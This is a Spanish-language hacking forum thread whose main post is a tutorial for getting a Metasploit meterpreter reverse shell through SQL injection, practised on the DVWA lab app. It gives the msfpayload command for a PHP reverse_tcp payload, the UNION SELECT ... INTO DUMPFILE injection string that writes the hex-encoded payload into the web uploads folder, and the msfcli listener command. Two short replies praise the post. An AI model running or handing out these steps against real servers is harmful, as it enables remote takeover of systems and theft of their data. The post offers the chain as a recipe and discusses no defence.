Underc0de

[In]Seguridad Informática => Bugs y Exploits => Mensaje iniciado por: Pr0ph3t en Mayo 02, 2012, 11:07:49 AM

Título: Obtener una sesion meterpreter explotando SQL Injection
Publicado por: Pr0ph3t en Mayo 02, 2012, 11:07:49 AM
Hoy vamos a ver como obtener una sesión de Meteperter explotando una vulnerabilidad SQL Injectión, para recrear este ejemplo vamos a utilizar DVWA.

1. Creamos el payload:

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 R > payload.php

2. Ahora este código lo tenemos que pasar la Hexadecimal. Para ello podéis emplear los multiples aplcaciones online que hay. Yo dejo las 2 que suelo usar:

http://ostermiller.org/calc/encode.html
http://www.seguridadwireless.net/php/conversor-universal-wireless.php

3. El codigo quedaría algo así:

233c3f7068700a0a6572726f725f7265706f7274696e672830...

4. Inyectamos el siguiente comando en la aplicación web:

' union select '',0x233c3f7068700a0a6572726f725f7265706f7274696e672830... into dumpfile '/opt/lampp/htdocs/uploads/payload.php'#

5. Nos quedamos escuchando para cuando se ejecuta el payload.

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.102 LPORT=10000 E


5. Ahora si nos vamos al sitio el cual hemos subido el payload (/opt/lampp/htdocs/uploads/) y lo ejecutamos tendríamos que obtener la sesión Meterpreter.

6. Si volvemos a la pantalla donde hemos dejado escuchando vemos que tenemos una sesión Meterpreter.


(http://2.bp.blogspot.com/-umPLO2261Vg/T5sFcnvj95I/AAAAAAAAGwg/RV_UMjky9v4/s1600/Pantallazo-4.png)

FUENTE: Segu-Info
Título: Re:Obtener una sesion meterpreter explotando SQL Injection
Publicado por: andrewtwo en Agosto 30, 2012, 04:59:52 AM
Me gusto por la combinación con metasploit  ;)
Título: Re:Obtener una sesion meterpreter explotando SQL Injection
Publicado por: Muppet en Agosto 30, 2012, 01:26:24 PM
Buen Aporte!